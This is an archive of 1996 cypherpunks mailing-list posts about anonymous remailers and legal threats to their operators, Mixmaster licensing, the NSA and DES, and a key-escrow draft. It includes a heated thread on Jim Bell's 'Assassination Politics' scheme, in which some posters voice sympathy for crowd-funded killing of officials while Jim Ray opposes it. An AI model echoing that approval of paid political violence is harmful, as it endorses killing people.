(Not saying there aren't such regulations, though I think they are clearly
unconstitutional. The "regulate commerce" language which is frequently
cited as justification for meddling in business should not be able to turn
a business into a lawbreaker for doing what individuals can do.)


In summary, what I receive in my mail, physical or electronic, is for me to
do with as I wish. This includes sending it on to another site, commenting
on it (*), etc.

(* A finesse I thought of a few years ago is this: If remailing is ever
banned or if remailers are held liable, use _quotes_. That is, I say:

----

To: foo@bar.baz
From: Tim-Remailer@black.net
Subject: Ever seen anything like this?

Somebody sent me this:

<message>

----

Now, what's a law against remailers going to do? Hold me liable for passing
a message on and asking for comment?

(Yes, I think this is a pretty transparently cute ploy to circumvent laws
about remailings. But it shows, I think, the can of worms that gets opened
should such a law ever get passed and then upheld. It would place limits
not only on what one could "remail without comment," but on what one could
_include_ in one's own messages!)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 22 May 1996 07:14:17 +0800
To: cypherpunks@toad.com
Subject: Re: Long-Lived Remailers
Message-ID: <adc74a7e21021004dd37@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:00 PM 5/21/96, Rev. Mark Grant, ULC wrote:
>On Tue, 21 May 1996, Timothy C. May wrote:
>
>> Traffic analysis will be quite easy to do, of course, as all mail sent to
>> the persistent address comes out of the "disposable@foo.com" address.
>> Q.E.D.
>
>Yeah, but the attack model I was assuming was lawyers rather than
>intelligence agencies. The NSA could probably easily link the two
>together, but the Church of Foobar(tm) probably couldn't. They'd only have
>access to the logs on the ISP and the information you gave when you signed
>up, not the raw packets on the Net.

The traffic analysis on this fixed mapping system needs no access to
packets and is childishly simple.

Let's call the first site "Alice" and the emanation site "Bob."

That is, all messages sent to the persistent site Alice appear to come from
the site Bob.

The Church of Clams can simply send messages addressed to themselves
through the Alice remailer and see immediately that they appear to come
from Bob.

Q.E.D.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 22 May 1996 05:00:41 +0800
To: cypherpunks@toad.com
Subject: Re: MixMaster fair use (fwd)
Message-ID: <199605211531.KAA16886@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 21 May 1996 16:06:07 +0100 (BST)
> From: "Rev. Mark Grant, ULC" <mark@unicorn.com>
> Subject: Re: MixMaster fair use
> 
> On Tue, 21 May 1996, Jim Choate wrote:
> 
> > What confuses me is the part above that states that I agree to use Mixmaster
> > for solely non-commercial use. This is NOT GNU or copyleft.
> 
> Isn't that because it uses RSAREF? AFAIR the RSAREF license says you can't
> use any RSAREF applications commercially without paying license fees. 
> 

But, it doesn't say word one about RSAREF not being used, it specificaly
mentions Mixmaster.


                                                Jim Choate






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 22 May 1996 07:05:49 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Rumor: DSS Broken?
Message-ID: <199605211740.KAA02723@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:32 PM 5/19/96 -0700, Bill Stewart wrote:
>At 08:05 PM 5/19/96 -0800, Jim Bell wrote:
>>It should occur to all of us that if the NSA was actually doing the job we 
>>are vastly over-paying them to do, it is THEY who should be finding, 
>>exposing, and correcting these kinds of cryptography faults.  
>
>They may have; they're just kind of selective in who they expose them to :-)

Yes...but...   How can the NSA serve two masters?  If the NSA has the 
American public's best interests at heart, then it should have revealed the 
flaw if it knew of it. (Otherwise, it can't be trusted...)  

If it did not, then it likewise should admit to this to show that their 
trustworthiness and reliability isn't particularly high and we shouldn't 
trust their opinions on Clipper etc.

It is at least arguable that the NSA might have a vested interest in 
allowing an enemy to continue to use a flawed encryption system, as in 
Enigma.   However, MD5 produces what ought to be secure hashes, right? A 
flaw in MD5 allows the person knowing the secret flaw to fake a file that 
produces a similar hash.  What interest could the NSA possibly have in 
allowing such faked files to be produced?  Is this part of the NSA's job 
description?


>Also, there are expert cryptographers outside the NSA, and outside the US;
>you might check where Dobbertin lives.  And this is a Good Thing.

Yes, it is.  But I'd like to think that the NSA isn't acting as if WE are 
the "enemy."


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 22 May 1996 07:17:42 +0800
To: Hal <cypherpunks@toad.com
Subject: Re: An alternative to remailer shutdowns
Message-ID: <199605211741.KAA02765@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:02 PM 5/20/96 -0700, Hal wrote:

>I was contacted by the FBI on Friday due to some threatening mail which
>was apparently sent through my remailer.  According to 18 USC 875(c),
>"Whoever transmits in interstate commerce any communication containing
>any threat to kidnap any person or any threat to injure the person of
>another, shall be fined not more than $1,000 or imprisoned not more
>than five years, or both."  I may not be able to continue operating
>either of my remailers (alumni.caltech.edu and shell.portal.com) for
>much longer due to this kind of abuse.

You may recall that when the Leahy encryption bill was proposed, and many 
people around here were fawning all over it, I raised the issue that it 
would allow the govt to harrass and prosecutor encrypted remailer operators 
since their use of encryption allows investigations to be thwarted.  What 
you've just seen, while not directly involving encryption, is the analogous 
version of such harassment with simple remailers.

If there is any need for laws or regulations here, it is one to explicitly 
exempt remailers from responsibility for email they forward, or decrypt and 
then forward.  (It isn't clear, for example, why a remailer is any more 
responsible for the contents of a message than any other point on the 
Internet chain.)

Obligatory AP reference:

If AP was up and functioning, there wouldn't be a government to fund an FBI 
to pay agents to come and harass you for forwarding a message that they've 
probably misinterpreted anyway.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robin Powell <rpowell@algorithmics.com>
Date: Wed, 22 May 1996 04:35:48 +0800
To: sameer@c2.org
Subject: Re: Is Chaum's System Traceable or Untraceable?
In-Reply-To: <199605181841.LAA17739@infinity.c2.org>
Message-ID: <96May21.105344edt.20485@janus.algorithmics.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> sameer <sameer@c2.org> writes:

    >> 
    >> (On the other hand, I have had a longstanding faith that the system can be
    >> made to be both payer- and payee-anonymous. Moneychangers, for example.)

    > 	You don't need faith. You don't need moneychangers, even. You
    > just need to pay attention when Ian posts to cypherpunks.

I don't see how Ian's stuff allows this.

BTW, I went to school with him and will re-iterate what others have
said: he's a pretty amazing guy.  Didn't talk much, though :-) (this
was back at the University of Waterloo).

-Robin




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@infonex.com (Lance Cottrell)
Date: Wed, 22 May 1996 07:47:24 +0800
To: Adam Shostack <loki@infonex.com (Lance Cottrell)
Subject: Re: The Crisis with Remailers
Message-ID: <adc7b6ff03021004b281@[206.170.115.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:36 AM 5/21/96, Adam Shostack wrote:
>Lance Cottrell wrote:
>|
>| An interesting problem with anonymous postage is that it is likely to kill
>| cover traffic generators.
>|
>
>Postage is most needed at the point of delivery.
>
>That is the node that will be taking the heat/paying the lawyers.  I'd
>operate a remailer if I was never the last node, becuase I don't have
>a site that can take the heat/seizure of machines for me.  If we pay
>those final nodes to do more, than intermediate nodes can still carry
>cover traffic for free.
>
>Adam
>
>--
>"It is seldom that liberty of any kind is lost all at once."
>                                                       -Hume


This is true. It is also something which would be easy to build into
Mixmaster. The Message payload has a much looser format than the rest of
the message. The postage could simply be prepended to the subject and
destination fields (which are already variable length). Time to actually
look at the API :)

        -Lance

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@infonex.com (Lance Cottrell)
Date: Wed, 22 May 1996 08:04:23 +0800
To: Jim Choate <cypherpunks@toad.com
Subject: Re: MixMaster fair use
Message-ID: <adc7b8c6050210041d72@[206.170.115.3]>
MIME-Version: 1.0
Content-Type: text/plain


The problem is RSAREF. I can't chose license terms for that.

        -Lance

At 7:00 AM 5/21/96, Jim Choate wrote:
>Hi all,
>
>Perhaps I am confused about what MixMaster's license allows. I have joined
>the confusing part (for me anyway)...
>
>README.no-export :
>
>All the files in this archive contain crpytographic code which is
>restricted by the ITAR regulations on munitions.
>These files may only be retrieved by US citizens, and only on condition of
>agreement not to export any of this software or dats, and to extract
>a similar agreement from any person they may transfer it to.
>
>To access the export-controled materials on
>this site, you must agree to "THE AGREEMENT"
>below. If your email address ends in one of the following:
>
>.edu .com .edu. .gov .mil .org .net .us .ca
>
>Do this by sending "THE AGREEMENT",
>exactly as it appears, to
>
>   mix-request@jpunix.com
>
>
>If it does not, but you qualify to retrieve
>Mixmaster under "THE AGREEMENT", then send mail
>to perry@alpha.jpunix.com, explaining your
>situation.
>
>In either case you will be sent a message containing
>the name of a hidden directory in which you will
>find the controlled software. The name of the directory
>changes frequently, so you must get the name
>each time you want to access the hidden directory.
>
>        -John A. Perry 5/6/95
>
>--------------------------------------------------
>        THE AGREEMENT:
>I am a citizen or national of the United States,
>or of Canada, or have been lawfully admitted for permanent
>residence in the United States under the
>Immigration and Naturalization Act.
>
>I agree not to export Mixmaster, or RSAREF
>or any other software in this archive,
>in violation of the export
>control laws of the United States of America as implemented
>by the United States Department of State Office of
>Defense Trade Controls.
>
>Before I download Mixmaster, I will read
>and agree to the terms and conditions of the RSAREF
>license (in ftp://ftp.jpunix.com/pub/rsalicen.txt).
>
>I will use Mixmaster solely for non-commercial purposes.
>----------------------------------------------------------
>
>Directory name last changed at: Wed May 1 09:00:01 CDT 1996
>
>
>End README.no-export
>
>
>What confuses me is the part above that states that I agree to use Mixmaster
>for solely non-commercial use. This is NOT GNU or copyleft.
>
>
>
>
>                                                  Jim Choate

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 22 May 1996 07:58:40 +0800
To: jim bell <stewarts@ix.netcom.com>
Subject: Re: Rumor: DSS Broken?
Message-ID: <199605211817.LAA00206@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  8:39 PM 5/20/96 -0800, jim bell wrote:
>At 01:05 AM 5/20/96 -0700, Bill Frantz wrote:
>>I was rather impressed by NSA's role in the creation of DES.  The
>>strengthened it against an attack which was not publicly known, and didn't,
>>in the process, reveal the attack.  (See AC2.)
>
>Isn't this partly bad, at least?

Given NSA's responsibilities to:
 (1) Break foreign crypto systems.
 (2) Make US crypto systems unbreakable.
 (3) Never Say Anything.
I find it remarkable they were that open.

They had a technique which helped them with 1.  They didn't want to reveal
it or foreign systems would be changed hurting NSA's pursuit of 1.  They
had a (small, DES was public and therefore could be used by foreigners)
obligation thru 2 to help with DES.  They honored 3 by saying as little as
possible, while still strengthening DES.

>All in all, I don't think the NSA's near-silence on DES is unambiguously 
>commendable.

If they were cypherpunks, or academic cryptologists I would agree. 
However, their responsibilities do not involve publishing, so I can't fault
the way they skated thru the maze of conflicting responsibilities given
what we know.  I can not fault them for following their charter.  (Faulting
their charter is a different matter.)

When designing crypto systems, it is worthwhile to consider NSA as the
opponent, because as far as I know, they are the best there is.  If your
system is secure from NSA, then it is secure from everyone except insiders.
 However the government always skates between the horns of the dilemma that
acting on the results of NSA intercepts may cause their opponents the
change their crypto systems, cutting off the intercepts.

This logic says the government can always act on the results of 40 bit key
intercepts because everyone knows they are insecure.  If they acted on a 56
bit key intercept, it would make concrete what we already know
theoretically.  If they acted on a 96 bit key intercept, people would
abandon the underlying crypto system because of the unfeasibility of brute
forcing a 96 bit key.  (When considering what to abandon, the random
process used to generate the 96 bits should be at least as suspect as the
crypto system.)


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Wed, 22 May 1996 08:42:56 +0800
To: cypherpunks@toad.com
Subject: Re: SEVERE undercapacity, we need more remailer servers FAST (fwd)
Message-ID: <Pine.SUN.3.92.960521111133.7752A-100000@linda.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


[Zed, sorry to send this twice -- forgot to add the list address, and I
have additional info...]

On Wed, 22 May 1996, Zed wrote:

[snip]
> Now to try to get this back on-topic, there was one NOTS document which was
> posted anonymously before the whole pack made it to
> alt.religion.scientology. It described a process(or "ritual" if you prefer)
> designed to help _physical_ affliction. It _may_ violate an FDA ruling
> prohibiting the Church from practising medicine. It is _definitely_ a
> violation of copyright to post it and one person, Keith Henson, is getting
> sued for quoting it. Now, was sending this NOTS document through an
> anonymous remailer a good or a bad thing to do?

I'm confused.

I thought Keith had admitted posting the document, but claimed that the
materials describe illegal acts (as you mentioned) and that posting is in
the public interest, or something like that.  How are they suing him if
he posted anon?

I've been away from a.r.s. for a while, but I'm back there now and am
trying to get back up to speed...



Bye :)

Rich

p.s.  Okay, I hit Ron Newman's web page, and it seems my suspicion was
correct.  Here's a quote from Keith's post, which contained NOTS 34 -- he
posted it from his own account, not via a remailer:

: I had not been inclined to look at this
: material before (it's *boring*), but your TRO inspired me.  Assuming
: this is real, I can see why the "Church" of Scientology is trying to
: suppress this material.  If carried out, the instructions in this
: particular bulletin amount to *criminal* acts, to wit, the practice of
: medicine without a license.  I reproduce this widely available
: document in its entirety for your edification.

Had he posted it through a remailer, I think it would have been well
justified.  He was obviously blowing the whistle on what he saw as illegal
activities.  That's a much different matter than posting the entire NOTs
series, though.  The wholesale copying is what most people seem to object
to, though my observations tell me that the "Church" objects to any
copying, even for fair use...


______________________________________________________________________
Rich Burroughs  richieb@teleport.com  http://www.teleport.com/~richieb
See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon
New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Wed, 22 May 1996 06:34:19 +0800
To: cypherpunks@toad.com
Subject: Re: The Crisis with Remailers
Message-ID: <9605211627.AA04637@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain



tcmay@mail.got.net wrote:
> 
> At 5:25 AM 5/21/96, Lance Cottrell wrote:
> 
> >An interesting problem with anonymous postage is that it is likely to kill
> >cover traffic generators.
> >
> 
> I doubt it. It's easy enough for remailers to, for example, pass out free
> tokens to other remailer operators.
> 
> (Jukebox and other coin-op concessions often pass out tokens (slugs, or
> marked coins) to storeowners and bartenders to use to stimulate the
> market.)
> 

Wouldn't the "income" from other cover generators help cover the cost
of a remailer running its own cover generator?

Also - remailers could possibly give postage free service to 
traffic for other remailers.... i.e. only the last node (who 
has the most exposure anyways) would require payment.

Dan
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Wed, 22 May 1996 05:25:48 +0800
To: jya@pipeline.com (John Young)
Subject: Re: NIST Draft Key Escrow Paper
Message-ID: <v01510106adc7a066e00a@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain


Contrary to what the attached note says, there is no draft copy available yet.

OMB publications at the number below says: "We're just finding out about
the report. We're not sure if they're going to give us copies or not."

-Declan


>   [Forward]
>
>   From: Elaine Frye <elaine.frye@nist.gov>
>   Subject: draft key escrow paper
>
>   May 20, 1996
>
>   Note
>
>   To:  Key Escrow Distribution List
>
>   From:  Ed Roback, NIST
>
>   Subject:  Release of DRAFT Key Escrow Paper
>
>   FYI, today the Interagency Working Group (IWG) on
>   Cryptography Policy released a DRAFT paper entitled
>   "Enabling Privacy, Commerce, Security and Public Safety in
>   the Global Information Infrastructure."
>
>   The DRAFT paper discusses a voluntary draft key management
>   infrastructure, supported by private sector key management
>   organizations, that would permit users and manufacturers
>   free choice of encryption algorithms, facilitate
>   international interoperability, preserve law enforcement
>   access, and, most importantly, provide strong system
>   security and integrity.  FYI, the paper was released by the
>   IWG co-chairs Ed Appel (NSC) and Bruce McConnell (OMB).
>
>   Comments on the draft paper are being solicited.  No
>   deadline is specified.
>
>   At present, I do not have an electronic copy of the draft
>   (25 pp).  Copies are available through the OMB publications
>   office at 202-395-7332.  I anticipate that the document
>   will soon be available widely on the net and will forward
>   you a web address when available.
>
>
>   *****************************************************
>   Elaine Frye
>   Computer Security Division
>   National Institute of Standards and Technology
>   Bldg. 820, M.S. Room 426
>   Gaithersburg, MD  20899-0001
>   Voice:   301/975-2819    Fax:  301/948-1233
>   *****************************************************
>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Wed, 22 May 1996 08:33:43 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Re: An alternative to remailer shutdowns
In-Reply-To: <199605211741.KAA02765@mail.pacifier.com>
Message-ID: <Pine.SUN.3.92.960521113026.7752B-100000@linda.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 21 May 1996, jim bell wrote:

[snip]
> You may recall that when the Leahy encryption bill was proposed...
[snip]

Blah, blah, blah.

This situation has nothing to do with the Leahy bill.  As you mentioned,
crypto is not the issue here. It's whether we get to have remailers,
period -- encrypted or not.

Why must you persist in bringing the bill up, constantly, whether it
applies to the situation being discussed or not?  Your gonna hurt your
arm, reaching around to pat yourself on the back like that ;)



Rich

______________________________________________________________________
Rich Burroughs  richieb@teleport.com  http://www.teleport.com/~richieb
See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon
New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Wed, 22 May 1996 06:56:55 +0800
To: cypherpunks@toad.com
Subject: Private e-mail...[was Re: AP]
Message-ID: <199605211545.LAA11970@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Must ALL my e-mail be re-posted to this damn list? I will
AGAIN remind careful readers: _Anything_ that does not
begin with the words: -----BEGIN PGP SIGNED.... and end
with my little play on the sound of J. Edgar Freeh's name
may *or may not* be from me, and is more likely to simply
be from someone:a) clue-impaired and b) noisy. Actual Jim
Ray posts also tend to have fewer typos, and be both more
detailed and shorter than this did, because I proof them
and I tend not to proofread private e-mail.

I will now clutter the list to respond to this nitwit's
moronic claims in public, please direct all Perrygrams
to <jf_avon@citenet.net>  [GROAN!--Why me???] Oh yeah.

Ray's Corrolary to Murphy:"You will be spared _NOTHING_."
<sigh>

I'll attempt to cut as much as possible to put wasted space
to a minimum. My apologies to those not interested, who are
advised to hit delete now (I'd imagine that includes many
or most of you).
JMR

jf_avon@citenet.net for some strange reason posted:

...

>Is there a Detweiller FAQ somewhere?

There's even a page, near the top of my page. He's also
mentioned under "don't feed the animals" in the welcome
message. He is intelligent, and he's quieter than he
used to be, perhaps taking his meds.

>Interesting.  Has AP ever popped-up in the conventional medias?

AFAIK not yet, but I could be wrong. If I were Slick Willie, it
would have been all over the place by now.

[BTW, for the record, I don't make a habit of calling those who
would advocate violence "loon" in a public forum. There are thus
self-preservation advantages to actually convincing the clueless
to lurk, look at message headers, and read "Netiquet" before
posting. <sigh>]

>Then, again, I know an awfull lot of people who would applaude Bell.  
>But most of them are not computer litterate.  They are from another 
>generation, not brainwashed by "Don't ask what your country can 
>do for you; ask what you can do for your country"...

How do these people vote, though? [Prediction: majority statist.]
You can't complain when the govt. gives what you ask for...
[Absent the unConstitutional ballot-laws we are blessed with here
in Florida.]

>> I'm 35, and I may actually die before I do. I hope not.

[Sniped to convey no context whatsoever] I was talking about
the very low odds of me someday actually *respecting* a living
US President, for those of you without telepathy skills. I
*would* feel old by haing this revealed, but I just learned
of a cypherpunk _grandmother_! [No, I won't say who.]

>[Black humor] any AP proponents with an eye (or a buck) on you?  :)

Possibly. Bell insists Libertarians like me shouldn't worry.
I worry, because statists' money spends just as well as mine.

Tim joked a while back about putting a "fire-and-forget" K
out on me when I was *last* misquoted as the "Cyberangel." I
seem to attract this crap, but I assure you it's NOT AT ALL
deliberate. All is forgiven, no apology needed, just please
try to be careful and remember the other 1000+ subscribers.

...

>> This kind of thinking might authorize a massive Cherokee
>> massacre if it spread, IMO.
>
>Please, do point out the similarities and the differences... I think 
>that the context is very different.

Not really, only the time in history. Their property was 100%
taken, and they were marched to OK from GA. The IRS may be
bad...but they aren't THAT bad...[disclaimer: I am (a tiny)
part Cherokee, and I hate the IRS (a lot).]

...

>
>Are you talking of an open war a la Bosnia?  

Hopefully not. It is what I fear.

>> We must either leave some wrongs in the
>> past or be cursed with them forever.
>
>This is what I was talking about taking things out of context.  Since 
>you agree on that, the Cherokee thing is ruled out.  But govt action 
>are a matter of the present and future.  Some peoples see it as 
>legitimate self-defense.

I disagree on ruling Cherokees out, _I_ decide what I rule out,
not you. The legitimate *peaceful* self defense options have
not yet been adequately explored, IMO.

>...

>> Bottom line for me: "Two wrongs don't make a right." 
>
>Please state the basic premise that make you declare what is "wrong"
>in the context of AP.

"Thou shalt not kill..." [pretty basic stuff here...]

>  I am not bugging you simply to do so.  For
>example, do you think that, for ethical reasons, you are not only
>justified but actually *obligated* to use physical violence in
>certain contexts?  I guess not.

No, just not as a first-resort in non-life-threatening contexts.

>  But many peoples think they have
>to...

If they break my door down and want my gun or PGPkey, I may shoot.
No matter who does this, they could die if they go far enough.
I will not seek to kill anyone from afar, though, and I'd have
to feel in immediate fear for my life before I can morally
justify killing another person. Luckily, it hasn't happened
so far.

>I think that you simply try to evade the necessity of defining for 
>yourself what exactly is what the govt is doing.

Taxation is theft, I fail to see your point. Murder isn't the
sole, or even first, option to prevent theft when you can do
things like lock your doors. [encrypt] Did the OKCity bombing
reduce the size of government, or increase it?
(As I predicted, increase. I hate it when I'm right.)
Violence begats violence. Always.

...

>General opinion is not what define truth nor reality.  If I refuse
>to pay my taxes, they'll use physical violence to get what they
>want.  You might object that I enjoyed the benefits of the spending
>of taxes, but I am yet to see any contract that I entered with
>"society".
>

At this point, as an individual protest, a (suicidal) "freeman"
like stand is justified if you like the idea of being a dead hero.
I don't. Yet. There are other options. But general opinion _does_
define political reality, so best that there be more responsible
uses of anonymity at this very delicate point in the remailernet's
political life. There seem to be less.

...me -- [AssPol would have to entail an oligarchy...]

>This scheme is *not* an oligarchy.  Pay a visit to any good dictionary 
>near you.  Words have precise meaning and it is *much* better to 
>stick to it...

I said entail, *you* read a dictionary. The scheme relies on $,
and more $ gives you more "votes" on who to kill. Oligarchy, a
rule by the rich. I stuck exactly to it. Read more carefully
in the *non-header* part of messages, too.

>Actually, since it is ruled by money, it might be a "buckarchy", but 
>again, everybody can spare a few bucks, so it might be a democracy 
>too if you insist on twisting the meaning of words.

HUH???? "buckarchy" isn't in my dictionary...I neither twisted
*nor invented* any words. Democracy is also a legitimate fear,
and the operative word in your statement is "might." Well,
might NOT also...

I happen to prefer a constitutional republic to democracy anyway.
Tim May has written well on this, and on why. [Hi Tim.]

>> and I think I'd be an easy target for
>> wealthy statists, who could also use the system.
>
>At first look, of course.  But operationnally, you have to consider the 
>mind of the statist to figure out the likeliness of their using the 
>system? I do not deny that it is very likely that a few statists will 
>use the system.  But most won't because they don't like to slain 
>their milk cows.

That's not how I view statists. Your faith is admirable,
but I won't share it soon. Hitler, Stalin, Clinton, Bush,
Biden, Dole, etc. - they all would just as soon see me as
hamburger as milk cow. As hamburger I'm no longer such a
smart-ass under their skins.

I have seen how history describes the minds of statists who
don't get their way & it's not pretty. _Many_ statists have
the $ to kill me, without AP, this would make me cheap and
compromise the privacy of the remailernet [probably] or just
cause remailers to be outlawed. If I operated a remailer,
and you bought or sold 500 lbs of cannabis through it, I
would try to cooperate to the minimum possible extent of
the law, ad perhaps go to jail for contempt, it depends.

If you tried AP, I would let the BATF (yes, I hate them,
too) log all your use (while trying to somehow protect my
innocent users' privacy). I again boil it down to my Jim
Ray test:"Where's the victim?"<imagine Clara Peller here>


>> If Bell could post
>> fewer times, he'd be more convincing. He is in many killfiles.
>> JMR

And now, it's likely that I am, too. Allow me to reduce noise
even furter by preemptively saying "Plonk" right now, so it
doesn't need to be announced twice on the poor, groaning list.

>Many peoples cannot stand to see any opinions that differs from 
>theirs.  But why care at all be read by such peoples?

It's not that, I was speaking of post-frequency-noise. I had
seen the idea before Jimbell ever had it, in Tim May's
Cyphernomicon.

Tim has interesting, different things to say. Jimbell doesn't.

Whether I agree has nothing at all to do with repetitiousness.
I will try VERY hard not to post again on this. Please help
by letting me have the last word (for once). How's this:

 Unsollicited[sic] public posting of private e-mail will be
 refuted at US165 $/h Any sender of such material will be
 considered as to have accepted the above mentionned[sic]
 terms.

JMR

PS, while I am making non-crypto-noise anyway...
================================================
Tim also wrote [in another message/thread]:

<...>
>(ObCaveat: I personally think a free society cannot/should not outlaw
>discrimination in any form, save that by government.)

Which is exactly the opposite of what we are faced with right now.
Gee, I wonder why race relations are doing so poorly nowadays?
We need more government intervention in this vital area...
</sarcasm>

 Jim Ray -- DNRC Minister of Encryption Advocacy.

"Your federal government needs your money so that it can perform
 vital services for you that you would not think up in a million
 years." -- Dave Barry
___________________________________________________________________
PGP id.E9BD6D35  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8
  <liberty@gate.net>       http://www.shopmiami.com/prs/jimray
___________________________________________________________________


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh.

iQCVAwUBMaHkdG1lp8bpvW01AQFJzAP6A0Vc25O61daOa6hnnZ8b0iSA5KYCS++q
zYXWrpYWujH6L8qF0USTkJ7Su1rVW3ge4GSsBMflwp8fp4Wh2By3PafX1CPF7TTl
a2Ns6eCO8SeUu4oGWnTQ2xeNR7ic07b2k+yuAVooR0f7qZQbE7SI7YHx/jhpz4Cp
AtBuBs9hYLo=
=FMxv
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Wed, 22 May 1996 07:04:01 +0800
To: liberty@gate.net (Jim Ray)
Subject: Re: AP
Message-ID: <9605211558.AA12519@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On 20 May 96 at 22:59, Jim Ray wrote:

> >Is there a Detweiller FAQ somewhere?
> 
> There's even a page

I found one out.  Interesting.  Vlad might very well fit the profile.


> >Interesting.  Has AP ever popped-up in the conventional medias?
> 
> AFAIK not yet, but I could be wrong. If I were Slick W.,
> it would.

I don't think Slick W. will make it pop-up.  They know damn well that 
no matter what the media might pretend the population thinks, there 
will be enough peoples more than willing to spend a few bucks to 
cause major joepardy.


> >Then, again, I know an awfull lot of people who would applaude
> >Bell.  But most of them are not computer litterate.  They are from
> >another generation, not brainwashed by "Don't ask what your country
> >can do for you; ask what you can do for your country"...
> 
> How do these people vote, though? [Prediction: majority statist.]
> you can't complain when the govt. gives what you ask for...

Theses peoples refuse to register their guns, although it is 
mandatory in canada (to be registered within 7(?) years...)

> Possibly. Bell insists Libertarians like me shouldn't worry.
> I worry, because statists' money spends just as well as mine.
> Tim joked a while back about putting a "fire-and-forget" K
> out on me when I was misquoted as the "Cyberangel."

So, are you saying that you chose to not endorse Bell's system 
because you fear you'd be a target?  Just asking...


> >> >You'll note that the psycho-epistemology necessary to
> >> >commit murder is quite close to the one necessary to coerce
> >> >poeples to pay taxes.
> >> 
> >> This kind of thinking might authorize a massive Cherokee
> >> massacre if it spread, IMO.
> >
> >Please, do point out the similarities and the differences... I
> >think that the context is very different.
> 
> Not really, only the time in history. Their property was
> 100% taken, and they were marched to OK from GA. The IRS
> may be bad...but they aren't THAT bad...[disclaimer: I
> am (a tiny) part Cherokee.

You did not answer my question:  When our local Mohawks accuse the 
white peoples to have stolen their land, I ask "when did I do that?  
I can't remember..."  I refuse to be held responsible for things that 
were done several hundred years ago.  Period.  As I said, I *never*, 
not even in my early years, believed in original sin.  


> >Are you talking of an open war a la Bosnia?  
> 
> Hopefully not.
What I meant is "do you believe that the AP scheme can lead to such 
events?"  I personnally believe that in the event AP is used against 
